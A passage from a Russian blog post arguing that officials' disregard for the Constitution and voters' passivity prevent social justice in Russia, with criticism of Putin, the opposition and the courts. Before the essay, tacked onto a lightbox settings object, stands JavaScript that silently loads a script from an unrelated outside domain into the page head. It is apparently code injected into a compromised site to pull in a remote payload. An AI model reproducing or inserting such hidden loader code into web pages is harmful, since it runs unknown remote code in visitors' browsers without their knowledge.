, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })
RSS
 

Что мешает построению в России социально-справедливого общества?

14 Сен

Актуальность ответа на этот вопрос вызвана событиями, которые происходят в стране.

Прежде всего, мешает игнорирование воли народа, изложенной в Конституции России, теми, кто взялся осуществлять государственную власть.

Произошло это в силу того, что, единственный источник власти в стране, многонациональный народ, провозгласив Россию демократическим государством, фактически устранился от контроля над тем, как осуществляется управление страной.

Прямое участие народа в решении государственных дел, путём референдума, фактически отсутствует.

Более того, избранники народа почти ничего не  делают для того чтобы права и свободы россиян стали высшей ценностью.

Если в стране нет народовластия, то властвует самовластие чиновников.

Самовластие — синоним не беззакония, а власти, наделенной по закону практически неограниченными полномочиями. Таким было самодержавие и власть большевиков.

Власть  царей, а затем и вождей была вполне законной в рамках действующего в то время права — наследственного или революционного. Оно признавало волю властвующего лица или большевиков.

Эти власти  рухнули, но им на смену пришло новое самовластие, создателями которого стали избранные  всенародным голосованиям лица, взявшиеся осуществлять государственную власть  в новой России.

Анализ жизни в новой России показывает, что осуществляющие государственную власть не взялись  исполнять волю народа, изложенную в Конституции России, обеспечивать достойную жизнь россиянам, а  озаботились своим  благополучием.

Примеров тому множество.

Установили для себя льготы,  которых нет в правовых демократических государствах. Не устыдились  зарплат, превышающих зарплаты миллионов работающих россиян в 100 и более раз.

Фактически они себя определили высшей ценностью, отсюда и игнорирование, не признание, не соблюдение и  не защита прав и свобод россиян.

Однако молчаливое большинство россиян это не возмущает.

Многочисленные встречи россиян с Владимиром Путиным и иными избранниками народа, это подтверждают.

Шумят, а иногда и митингуют  только те, кто назвал себя оппозицией и рвётся сам осуществлять государственную власть.

Критикуя тех, кто забыл о воле народа, изложенной в Основном законе страны, они обещают народу своё самовластие, поскольку не предлагают никаких мер по установлению в стране власти Конституции, обеспеченной её гарантом и правосудием, что и способно умерить любое самовластие.

Трудно представить, что было бы со страной, если бы Ксения Собчак стала Президентом России.

Никто из оппонентов в своих программах не называет мер, которыми они собираются обеспечивать исполнение обязанностей гаранта Конституции.

Все оппоненты заученно твердят о «независимом суде», забыв о том, что единственный источник власти в стране, многонациональный народ, установил, что судья обязан повиноваться, подчиняться, беспрекословно слушаться, быть зависимым только от Конституции и федеральных законов.

Но именно эту зависимость судей от законов, никто не проверяет. Ни гарант Конституции Владимир Путин, формирующий состав исполнителей судебной власти, ни вышестоящие судебные инстанции.

Какой смысл было тратить миллиардные средства на создание https://zen.yandex.ru/media/news.ru/kaznit-nelzia-objalovat-zachem-rossii-novye-sudy-5d7a3b113639e600ad37619c   девяти кассационных, пяти апелляционных и два военных суда, если ими не проверяется исполнение судьёй назначение уголовного судопроизводства, остаётся без внимания исполнение порядка судопроизводства?

Пока россияне не осознают важности жизни по тем правилам, что они сами определили в Основном Законе страны, они обречены на самовластие, являющееся причиной социальной несправедливости в обществе.

Если причиной трёх революций в России был не решённый земельный вопрос, а четвёртая революция 1991—1993 гг. произошла в результате  того, что общество, вдруг, обнаружило «огромную социальную несправедливость».

Подобные причины для новой революции назрели и сейчас.

Как избежать этого?

Надо, единственному источнику власти в стране, многонациональному народу, понять, что избирать  во власть надо тех, кто способен  исполнять волю народа и делами доказал, что совестливый.

 
Комментариев нет

Автор: ossin Категория: Прочие заметки

 

Оставить комментарий

Вы должны войти, чтобы оставить комментарий.